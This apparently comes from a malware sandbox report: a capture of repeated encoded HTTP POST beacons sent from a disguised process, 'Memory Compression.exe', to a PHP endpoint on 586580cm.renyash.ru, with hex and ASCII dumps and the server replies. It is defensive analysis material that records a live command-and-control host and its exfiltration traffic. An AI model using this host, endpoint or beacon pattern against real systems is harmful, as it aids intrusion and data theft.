                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ur5npmX96P3ljNMyfmYhNDFytKdgQ6je02CRZOGlfNCG44NbIn0Mx9ZW%2F3iAkEhOLfmPzOnwZ81sxRe5PoG06sBSJEN14ZPa9x8zV44GA9kdBYdZ%2FFkHcyJAggG8SPl5Bx4NFkWG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573e77b7c8c09-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7989&min_rtt=1969&rtt_var=12779&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=29123&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                104192.168.2.550086104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:53.318588972 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:53.674031019 CET1060OUTData Raw: 5a 52 5d 5f 5a 5e 58 5c 5c 5f 50 57 54 51 59 53 59 5c 5b 58 57 5f 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]_Z^X\\_PWTQYSY\[XW_TY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^1V _<$4_3;=*]349>S':R<%+Z!7S=.^''P*5
                                                                                                                                Jan 11, 2025 15:03:53.792504072 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:53.950864077 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GS0ITj4WKeOS%2BJJyfdFO61tDmuREoRF5IMBQmW4BYT%2FpHsjTWFTvlLLyX5QVmsr0vqcrw2gihCWZ%2BIxjjttKr%2BV%2F%2FGB5Zk4zVhToTUzK3C3JJjRV98kMpIuAeCpH23r%2BOXlVyxxp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573ecefa27c8e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4879&min_rtt=1931&rtt_var=6621&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=57210&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                105192.168.2.550087104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:54.089413881 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:54.439443111 CET1060OUTData Raw: 5a 55 5d 55 5f 5c 58 52 5c 5f 50 57 54 57 59 5d 59 51 5b 5c 57 5f 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]U_\XR\_PWTWY]YQ[\W_TP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"1<\? !1:'))8? .W3<%?6$5(*+.^''P*-
                                                                                                                                Jan 11, 2025 15:03:54.531279087 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:54.707094908 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFl8cuf%2B0YX1hRX1nooA4rBnHbvih29NTCWGDcdVrfz%2BRo0jS1GxxvhuGdw1SXFpbgEhvc4wH0%2F0Idx2Qb2%2By2nwZeMZPicWDKuMDqMqX13%2Fz%2BnGMIBxsnQ%2BwRenj3yiE2e8a6b2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573f19cad42e5-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3457&min_rtt=1744&rtt_var=4080&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=94492&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                106192.168.2.550088104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:55.054604053 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:55.409044027 CET1060OUTData Raw: 5f 54 58 59 5f 5a 5d 50 5c 5f 50 57 54 54 59 52 59 5d 5b 59 57 50 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _TXY_Z]P\_PWTTYRY][YWPTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y14+1##0*9><450?*(@'Z5+*+.^''P*!
                                                                                                                                Jan 11, 2025 15:03:55.507873058 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:55.673918009 CET796INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jBv7jPvRFomIu%2F4IRMTpr9%2Bf5yq5ABtOJLASDED6KOvU%2FeHyMwdsv95mcwzV1JMrRZ7V3v5gHbqPjOdJWhaeak0TmfqGkkqqdKiyUAA4ZNMUxQGWUSeiwJVq0yiFDQVFSTzWMV7x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573f7ae8c43d7-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4665&min_rtt=1722&rtt_var=6532&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=57776&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:55.762394905 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                107192.168.2.550089104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:55.085968018 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:55.439531088 CET1776OUTData Raw: 5f 53 58 58 5a 5b 5d 57 5c 5f 50 57 54 56 59 5e 59 50 5b 50 57 5f 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _SXXZ[]W\_PWTVY^YP[PW_TX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y1V0(T+#!0>*"*+;49$,.U<;Y64(*.^''P*)
                                                                                                                                Jan 11, 2025 15:03:55.529230118 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:55.742486000 CET951INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xFesvU0WWkwOFCikXKOSICn86p%2BZgtm%2Bglgf75TINQ9MohgPWDgagSA0Xssddw5ss3ATLlkOJ7LthkDwaT94EAPYWAAen5cs0YRZV78%2FN0OcJgOt6cFOFnszTMRP0Z03920BhGrN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573f7cf934258-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1687&rtt_var=1179&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=376968&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 59 22 07 3d 0e 22 15 04 52 29 08 3f 59 24 09 25 1f 2a 32 00 5d 31 5d 3c 59 2d 28 0d 0e 36 04 33 02 30 3e 25 5e 27 00 35 0e 3f 11 2c 5d 00 10 20 19 33 0a 31 13 2d 22 31 1c 2a 08 24 42 20 05 3f 16 24 38 3e 12 20 0d 3b 5b 22 3d 39 5c 2f 0f 28 0f 39 24 08 5b 2e 16 20 5d 20 35 2b 55 00 14 20 53 27 2a 3c 10 29 23 3c 56 23 2b 3a 5c 24 15 23 0a 29 02 27 0a 2a 16 3a 0b 3c 02 3d 0b 37 06 31 1d 2a 55 3c 07 24 31 2d 53 25 16 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'Y"="R)?Y$%*2]1]<Y-(630>%^'5?,] 31-"1*$B ?$8> ;["=9\/(9$[. ] 5+U S'*<)#<V#+:\$#)'*:<=71*U<$1-S%!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                108192.168.2.550090104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:55.897305965 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:56.251847982 CET1060OUTData Raw: 5f 50 5d 5e 5f 53 58 5d 5c 5f 50 57 54 57 59 5e 59 51 5b 5d 57 50 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _P]^_SX]\_PWTWY^YQ[]WPT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&0'>!? 1)' >2++3 !%,!(<"$+T);.^''P*-
                                                                                                                                Jan 11, 2025 15:03:56.365696907 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:56.552448034 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19eEBvOnlDm0XpSQZmlYWK91AHJeOGwttiRWZAKJhwVwZX9xUo%2F8i71lVCFZja45iq6MUx%2BlrcvTZ19I6A4Zyr5jjbRyeKsSmJd7eCAmZ9Dr7pbmLKnpIonyGtWWygN8MRK8qI14"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573fd0f7d43be-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3257&min_rtt=1677&rtt_var=3790&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=101926&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                109192.168.2.550091104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:56.708368063 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:57.064379930 CET1060OUTData Raw: 5f 51 58 59 5a 5e 5d 50 5c 5f 50 57 54 5c 59 58 59 51 5b 5f 57 52 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _QXYZ^]P\_PWT\YXYQ[_WRTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X%V0\<, %'5=!^+;84)$?<<54;W)+.^''P*
                                                                                                                                Jan 11, 2025 15:03:57.180814028 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:57.430649042 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSArTkrfK37NUaGwv4ig9pv3daolSVYndrNyjgs7rJz3PAB%2Fx0hqE1WEwdGdBDNlb36F2WGRSxdLQX5vPblwHiZkyqIqiMZtQGbdThPROleupXaXH3jY%2F8aj52sOJEeiDosbgqPl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900574021eb82361-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3378&min_rtt=2022&rtt_var=3470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=113433&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                110192.168.2.550092104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:57.713373899 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:58.064325094 CET1060OUTData Raw: 5a 53 58 5a 5a 5f 5d 50 5c 5f 50 57 54 5d 59 5d 59 56 5b 5a 57 5e 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZSXZZ_]P\_PWT]Y]YV[ZW^T][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%0<T472*\'8X?)=[>+#_"'<%?645/R*.^''P*
                                                                                                                                Jan 11, 2025 15:03:58.181114912 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:58.451700926 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yMttTRU4Qb5ktJ0jpM%2FDpw1VlAJ8gzqXbkyEINq7AQxeMkGJgLyU%2Bsz%2BCrVdiFFsP92mE3c%2FL3pgTjJJTag909ULqwR8kw1FPePQKLvrQEEX9V1PLeWY61P1ygXUMkxa6X0f9Maf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005740858ac4277-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2945&min_rtt=1722&rtt_var=3092&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=126868&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                111192.168.2.550093104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:58.653099060 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:59.002331972 CET1056OUTData Raw: 5a 54 58 5e 5f 5e 5d 54 5c 5f 50 57 54 55 59 5d 59 5c 5b 5b 57 51 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTX^_^]T\_PWTUY]Y\[[WQT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2#4((]#&%;?*!Z=;8 %3*W+7 4<(+.^''P*=
                                                                                                                                Jan 11, 2025 15:03:59.105902910 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:59.276536942 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hnm8meTUcHax4jEp3AmVsEbQZbC1rP3J8nWuPtp7ZBsnU30HR6pAuqGxGwAOHFD%2F3Wf6XFeE%2BzeX0edaydcwY4crNTMbPCVTSG1GtIk0iw3QeKJFaGsCsI1XPLXtKV2mc27NUhq8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005740e2c7a42fe-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8040&min_rtt=1693&rtt_var=13329&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=27825&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                112192.168.2.550094104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:59.417274952 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:59.769382954 CET1060OUTData Raw: 5a 52 58 5d 5a 5b 58 57 5c 5f 50 57 54 51 59 5c 59 53 5b 51 57 57 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZRX]Z[XW\_PWTQY\YS[QWWTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y20 Y<2 290#*9=_*?49>W'/=*6/^6=.^''P*5
                                                                                                                                Jan 11, 2025 15:03:59.860512972 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:04:00.100418091 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:04:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
